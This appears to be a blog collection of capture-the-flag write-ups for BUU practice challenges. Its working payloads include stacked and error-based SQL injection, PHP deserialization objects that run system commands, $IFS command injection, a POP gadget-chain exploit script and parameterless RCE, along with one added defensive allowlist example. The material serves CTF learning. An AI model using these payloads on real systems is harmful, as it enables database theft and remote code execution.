BUU practice challenges

Source: cnblogs (博客园)

[强网杯 2019]随便注 (Qiangwang Cup 2019, "Casual Injection")

```
?inject=-1";show databases%23
?inject=-1";show tables from `supersqli`%23
?inject=-1";show columns from `1919810931114514`%23
```

This shows that the flag is in the flag column of table 1919810931114514 in the supersqli database, and that select|update|delete|drop|insert|where are all filtered.

Solution 1

```
?inject=-1";show tables from `supersqli`%23
?inject=-1";show columns from `words`%23
```

Rename word to some other table, then rename 1919810931114514 to word and change flag to data, for the word table

```
?inject=-1";alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);%23
?inject=1" or 1=1%23
```

This returns the flag.


Solution 2

```
?inject=1";HANDLER `1919810931114514` OPEN; HANDLER `1919810931114514` READ FIRST; HANDLER `1919810931114514` CLOSE;%23
```

This uses MySQL's optimized query (the HANDLER statement).

[SUCTF 2019]EasySQL

Input 1 echoes 1; input 0 echoes nothing. The guessed statement is select id||flag from Flag. Setting id to *,1 turns the statement into select *,1||flag from Flag, which returns the flag.

[网鼎杯 2020 朱雀组]phpweb (Wangding Cup 2020, Zhuque group)

Burp Suite shows this request. phpinfo is blocked. func=file_get_contents&p=index.php reads index.php:

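```php
// (the beginning of index.php is cut off on the page)
            func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
    if ($func != null) {
        $func = strtolower($func);
        // Blacklist check: only the function name taken from the request is tested
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>
```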

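As the source shows, every function that gives a shell directly is disabled, so the only route left is deserialization:

```
O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
```

This returns the flag.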
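The blacklist in index.php fails because a deserialized Test object reaches gettime() without ever passing the in_array() check. A hardened form of the same dispatcher follows as an added example, not the challenge's code: the allowlist contents and the names safe_call() and decode_untrusted() are assumptions, and the inputs are constructed.

```php
<?php
declare(strict_types=1);

// Assumed allowlist: the only functions a request may select.
const ALLOWED_FUNCS = ['date', 'md5', 'strtoupper'];

// Single choke point: a name is callable only if it is on the allowlist,
// so unserialize, file_get_contents and system are rejected by default.
function safe_call(string $func, string $p): string
{
    $func = strtolower($func);
    if (!in_array($func, ALLOWED_FUNCS, true)) {
        throw new InvalidArgumentException('function not allowed: ' . $func);
    }
    return (string) $func($p);
}

// Stand-in for the challenge's Test class; the destructor is the gadget.
class Test
{
    public $p = '';
    public $func = '';
    public function __destruct()
    {
        echo 'Test::__destruct ran with func=', $this->func, PHP_EOL;
    }
}

// Decode untrusted data without instantiating application classes: objects
// come back as __PHP_Incomplete_Class, so Test::__destruct never runs.
function decode_untrusted(string $blob)
{
    return unserialize($blob, ['allowed_classes' => false]);
}

// Constructed inputs, shaped like the write-up's requests but harmless.
$blob = 'O:4:"Test":2:{s:1:"p";s:3:"abc";s:4:"func";s:3:"md5";}';
foreach ([['md5', 'abc'], ['file_get_contents', 'index.php'], ['unserialize', $blob]] as [$func, $p]) {
    try {
        echo $func, ' => ', safe_call($func, $p), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $func, ' => rejected', PHP_EOL;
    }
}
$obj = decode_untrusted($blob);
echo 'decoded as ', get_class($obj), PHP_EOL;
```

The allowlist closes the request path and allowed_classes closes the gadget path; either one alone leaves the other open.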

[WUSTCTF2020]朴实无华 ("Plain and Unadorned")

robots.txt eventually leads to fl4g.php:

```
?num=1e5&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
```

[极客大挑战 2019]HardSQL (Geek Challenge 2019)

Error-based injection:

```
check.php?username=1&password=0"or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23
flag{a79e3f16-a79d-4949-abe2-e6

check.php?username=1&password=0"or(updatexml(1,concat(0x7e,(select(right(group_concat(password),30))from(H4rDsq1)),0x7e),1))%23
6-a79d-4949-abe2-e64d24a0c9bd}

flag{a79e3f16-a79d-4949-abe2-e64d24a0c9bd}
```

[MRCTF2020]Ezpop

```php
<?php
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file="index.php"){
        $this->source = $file;
        echo "Welcome to ".$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET["pop"])){
    @unserialize($_GET["pop"]);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
```

Gadget chain: Show::__wakeup -> Show::__toString -> Test::__get -> Modifier::__invoke

exp:

```php
// (the beginning of the script, including the start of the Modifier class, is cut off on the page)
        append($this->var);
        echo 1;
    }
}

class Show{
    public $source;
    public $str;
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

// Outer Show -> inner Show (string conversion in __wakeup) -> Test -> Modifier
$t=new Show();
$t->source=new Show();
$t->source->str=new Test();
$t->source->str->p=new Modifier();
echo urlencode(serialize($t));
```

[BJDCTF2020]The mystery of ip

SSTI through the X-Forwarded-For (XFF) header.

[GXYCTF2019]禁止套娃 ("No Nesting Dolls")

A git leak gives the source code. Parameterless RCE (reference article).

```
?exp=var_dump(scandir(current(localeconv()))); // list the files in the directory
?exp=var_dump(next(array_reverse(scandir(current(localeconv()))))); // flag.php
?exp=show_source(next(array_reverse(scandir(current(localeconv()))))); // read the file
```
